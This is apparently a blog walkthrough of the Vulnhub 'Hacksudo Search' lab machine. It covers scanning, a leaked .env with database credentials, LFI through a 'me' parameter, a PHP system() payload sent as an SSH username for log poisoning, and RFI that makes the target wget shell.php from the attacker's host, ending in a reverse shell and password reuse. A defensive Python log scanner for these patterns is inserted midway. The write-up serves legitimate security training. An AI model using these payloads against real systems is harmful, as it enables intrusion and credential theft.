Vulnhub: Hacksudo Search Target Machine Walkthrough

Hacksudo Search

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.196.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:96:d2:34      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.212  08:00:27:2a:e6:36      1      60  PCS Systemtechnik GmbH                                      liy            


Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.212.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.212 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 02:28 EST
Nmap scan report for localhost (192.168.56.212)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 7b:44:7c:da:fb:e5:e6:1d:76:33:eb:fa:c0:dd:77:44 (RSA)
|   256 13:2d:45:07:32:83:13:eb:4e:a1:20:f4:06:ba:26:8a (ECDSA)
|_  256 21:a1:86:47:07:1b:df:b2:70:7e:d9:30:e3:29:c2:e7 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: HacksudoSearch
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:2A:E6:36 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds

The Nmap results show that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.212/robots.txt
/* find me * im number 1 search engine .
 just joking :) 
www.hacksudo.com

The robots.txt file contains nothing of much value.

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ gobuster dir -u http://192.168.56.212 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.212
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/23 02:32:20 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.212/images/]
/assets               (Status: 301) [Size: 317] [--> http://192.168.56.212/assets/]
/account              (Status: 301) [Size: 318] [--> http://192.168.56.212/account/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.212/javascript/]
/LICENSE              (Status: 200) [Size: 1074]
/server-status        (Status: 403) [Size: 279]
Progress: 218394 / 220561 (99.02%)===============================================================
2022/11/23 02:32:45 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ gobuster dir -u http://192.168.56.212 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.212
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,sh,php
[+] Timeout:                 10s
===============================================================
2022/11/23 02:32:56 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.212/images/]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 715]
/.php                 (Status: 403) [Size: 279]
/search.php           (Status: 200) [Size: 165]
/submit.php           (Status: 200) [Size: 165]
/assets               (Status: 301) [Size: 317] [--> http://192.168.56.212/assets/]
/account              (Status: 301) [Size: 318] [--> http://192.168.56.212/account/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.212/javascript/]
/robots.txt           (Status: 200) [Size: 75]
/LICENSE              (Status: 200) [Size: 1074]
/search1.php          (Status: 200) [Size: 2918]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/crawler.php          (Status: 500) [Size: 0]
Progress: 1099496 / 1102805 (99.70%)===============================================================
2022/11/23 02:34:59 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ nikto -h http://192.168.56.212    
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.212
+ Target Hostname:    192.168.56.212
+ Target Port:        80
+ Start Time:         2022-11-23 02:35:42 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /account/: Directory indexing found.
+ OSVDB-3092: /account/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /.env: .env file found. The .env file may contain credentials.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2022-11-23 02:36:37 (GMT-5) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 


Nikto found the /.env file.

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.212/.env      
APP_name=HackSudoSearch
APP_ENV=local
APP_key=base64:aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QK
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!

The response contains a database username and password; let's test whether they also work as the SSH username and password:

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ ssh hiraman@192.168.56.212                                 
The authenticity of host '192.168.56.212 (192.168.56.212)' can't be established.
ED25519 key fingerprint is SHA256:dzS9ujCpu8ohIPbqCaxf4e6gi5YSgBrhAI8srwr1giU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.212' (ED25519) to the list of known hosts.
hiraman@192.168.56.212's password: 
Permission denied, please try again.
hiraman@192.168.56.212's password: 

It seems these are only the database credentials.

Looking at /search.php, it contains a button that links to Google with the parameters q and client:

<a href="https://www.google.com/search?q=hacksudo&client=">  

When visiting the Contact link on search1.php, the hint points at FUZZ?

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ wfuzz -c -u http://192.168.56.212/search1.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 288
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.212/search1.php?FUZZ=../../../../../../etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                      
=====================================================================

000001129:   200        143 L    260 W      3797 Ch     "me"                                                         
000011286:   200        137 L    288 W      2918 Ch     "subscribe1"                                                 


The parameter me was found; let's try it:

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.212/search1.php?me=../../../../../../../etc/passwd

<html>
<head>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">


<title>
Hacksudo::search
</title>
</head>
<body style="background-color:Navy;">
<!-- find me @hacksudo.com/contact @fuzzing always best option :)  --> 
<font color=white>

<div class="topnav">
  <a class="active" href="?find=home.php">Home</a>
  <a href="?Me=about.php">About</a>
  <a href="?FUZZ=contact.php">Contact</a>
  <div class="search-container">
    <form action="submit.php">
      <input type="text" placeholder="Search.." name="search">
      <button type="submit"><i class="fa fa-search"></i></button>
    </form>
  </div>
</div>

<div style="padding-left:16px">
  <h1><font color=red>HackSudo</font> Search box</h1>
  <p>JumpStation The web crawler with Google</p>
</div>

root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:*:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
search:x:1003:1003:,,,:/home/search:/bin/bash
                </form>
</font>
<font color=red><h2><marquee> <a href="https://www.hacksudo.com/">Visit --> www.hacksudo.com</marquee></h2></a> 
</font>
        </dch>
</body>
</html>

Try whether any private key file can be read (note added afterwards: look carefully at which usernames exist; during the exercise I overlooked the hacksudo user, otherwise a shell would have come much faster):

http://192.168.56.212/search1.php?me=/home/search/.ssh/id_rsa

No luck. Next I tried cracking the password with hydra; it ran for a long time and the password still did not come out.

But since the LFI (local file inclusion) vulnerability is exploitable, let's see whether a shell can be obtained through the auth.log file:

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ ssh  '<? php system($_GET["cmd"]);?>'@192.168.56.212
<? php system($_GET["cmd"]);?>@192.168.56.212's password: 
Permission denied, please try again.
<? php system($_GET["cmd"]);?>@192.168.56.212's password: 
Permission denied, please try again.
<? php system($_GET["cmd"]);?>@192.168.56.212's password: 
<? php system($_GET["cmd"]);?>@192.168.56.212: Permission denied (publickey,password).

This method did not work.

Besides LFI, /search1.php needs to be checked for RFI as well.

Start a local web server on Kali Linux and create a temporary file:

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ echo 'jason, hi, ' > test.txt
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Check whether RFI exists by visiting:

192.168.56.212/search1.php?me=http://192.168.56.206:8000/test.txt

The content of test.txt is read successfully, which proves that in addition to LFI, RFI exists as well.

Write a PHP script and access it through the RFI vulnerability so that the target downloads shell.php.

Visit:

http://192.168.56.212/search1.php?me=http://192.168.56.206:8000/cmdshell.php
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ cat cmdshell.php          
<?php
        system('wget http://192.168.56.206:8000/shell.php');
?>

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.212 - - [23/Nov/2022 03:34:23] "GET /test.txt HTTP/1.0" 200 -
192.168.56.212 - - [23/Nov/2022 03:41:08] "GET /cmdshell.php HTTP/1.0" 200 -
192.168.56.212 - - [23/Nov/2022 03:41:08] "GET /shell.php HTTP/1.1" 200 -
192.168.56.212 - - [23/Nov/2022 03:41:37] "GET /cmdshell.php HTTP/1.0" 200 -
192.168.56.212 - - [23/Nov/2022 03:41:37] "GET /shell.php HTTP/1.1" 200 -


shell.php was downloaded successfully; now open shell.php in the browser:

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ sudo nc -nlvp 5555       
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.212] 52122
Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
 03:42:38 up  1:18,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@HacksudoSearch:/$ 

A shell was successfully obtained on Kali Linux.
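From the defender's side, every step of the chain above leaves a distinctive trace in the server's logs. The following Python script is an added example (it is not code from the original writeup or from the Hacksudo project): it parses Apache access-log lines in the default Combined Log Format and OpenSSH auth.log lines, and flags the four patterns the walkthrough relied on: a request for the dotfile /.env, directory traversal or an absolute sensitive path in a query parameter (the LFI via me=), a URL in a query parameter (the RFI), and PHP tags in a rejected SSH username (the auth.log poisoning attempt). All sample log lines, timestamps and process ids are constructed to mirror the requests made above; only the field layout follows the real Apache and sshd formats.

```python
"""Flag the web-attack patterns from this walkthrough in constructed log lines.

Added example, not code from the original writeup or from the Hacksudo project.
Input: Apache access-log lines (Combined Log Format) and sshd auth.log lines.
Every sample line below is constructed to mirror the requests seen in the writeup.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log: ip ident user [time] "METHOD target PROTO" status ...
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# OpenSSH: "Invalid user NAME from IP" / "Failed password for [invalid user] NAME from IP"
SSHD_RE = re.compile(
    r'sshd\[\d+\]: (?:Invalid user|Failed password for(?: invalid user)?) '
    r'(?P<user>.+?) from (?P<ip>\S+)'
)
PHP_TAG_RE = re.compile(r'<\?|\?>')
# Absolute paths a file-inclusion parameter has no business pointing at
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/.ssh/", "/proc/self/", "/var/log/")
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp|php|data|expect)://', re.I)


def classify_request(target):
    """Return finding tags for one request target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    path = unquote(parts.path)
    # Hidden files at any depth: /.env, /.git/config, /account/.htpasswd ...
    if any(seg.startswith(".") and seg not in (".", "..") for seg in path.split("/")):
        findings.append("dotfile_request")
    if "../" in path:
        findings.append("lfi_traversal")
    # parse_qsl decodes one layer of percent-encoding; unquote again so that
    # double-encoded payloads such as %252e%252e%252f are still caught
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)
        if "../" in value or "..\\" in value:
            findings.append("lfi_traversal")
        elif any(p in value for p in SENSITIVE_PATHS):
            findings.append("lfi_absolute_path")
        if REMOTE_SCHEME_RE.match(value):
            findings.append("rfi_url")
    return list(dict.fromkeys(findings))  # de-duplicate, keep order


def scan_access_log(lines):
    """Return (ip, target, findings) for every access-log line that matches a pattern."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


def scan_auth_log(lines):
    """Return (ip, username, findings) for sshd failures whose username carries PHP tags."""
    hits = []
    for line in lines:
        m = SSHD_RE.search(line)
        if m and PHP_TAG_RE.search(m.group("user")):
            hits.append((m.group("ip"), m.group("user"), ["php_tag_in_ssh_username"]))
    return hits


# Constructed sample lines (not real logs from the target machine)
SAMPLE_ACCESS = [
    '192.168.56.206 - - [23/Nov/2022:02:36:10 -0500] "GET /.env HTTP/1.1" 200 312 "-" "curl/7.85.0"',
    '192.168.56.206 - - [23/Nov/2022:03:10:42 -0500] "GET /search1.php?me=../../../../../../../etc/passwd HTTP/1.1" 200 3797 "-" "curl/7.85.0"',
    '192.168.56.206 - - [23/Nov/2022:03:15:03 -0500] "GET /search1.php?me=/home/search/.ssh/id_rsa HTTP/1.1" 200 2918 "-" "Mozilla/5.0"',
    '192.168.56.206 - - [23/Nov/2022:03:34:23 -0500] "GET /search1.php?me=http://192.168.56.206:8000/test.txt HTTP/1.1" 200 2930 "-" "Mozilla/5.0"',
    '192.168.56.206 - - [23/Nov/2022:03:00:00 -0500] "GET /robots.txt HTTP/1.1" 200 75 "-" "curl/7.85.0"',
    '192.168.56.206 - - [23/Nov/2022:03:01:00 -0500] "GET /search1.php?find=home.php HTTP/1.1" 200 2918 "-" "Mozilla/5.0"',
]
SAMPLE_AUTH = [
    'Nov 23 03:20:01 HacksudoSearch sshd[2101]: Invalid user <? php system($_GET["cmd"]);?> from 192.168.56.206 port 40512',
    'Nov 23 03:20:05 HacksudoSearch sshd[2101]: Failed password for invalid user <? php system($_GET["cmd"]);?> from 192.168.56.206 port 40512 ssh2',
    'Nov 23 03:18:00 HacksudoSearch sshd[2090]: Failed password for hiraman from 192.168.56.206 port 40488 ssh2',
]

if __name__ == "__main__":
    for ip, target, findings in scan_access_log(SAMPLE_ACCESS):
        print(f"{ip} {','.join(findings):<18} {target}")
    for ip, user, findings in scan_auth_log(SAMPLE_AUTH):
        print(f"{ip} {','.join(findings):<18} {user!r}")
```

Run stand-alone it prints one line per flagged request; the two harmless sample requests (robots.txt and the legitimate find=home.php) produce nothing. The same classification applied at the application layer is the mitigation: an include parameter should be matched against an allowlist of page names rather than passed to include(), and dotfiles such as .env should be denied by the web server so the credential leak that started this chain never reaches the client.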

The database password works for the hacksudo user:

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ ssh hacksudo@192.168.56.212           
hacksudo@192.168.56.212's password: 
Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 15 14:10:28 2021 from 192.168.43.217
hacksudo@HacksudoSearch:~$ 

Privilege escalation


posted @ 2022-11-23 16:57  Jason_huawen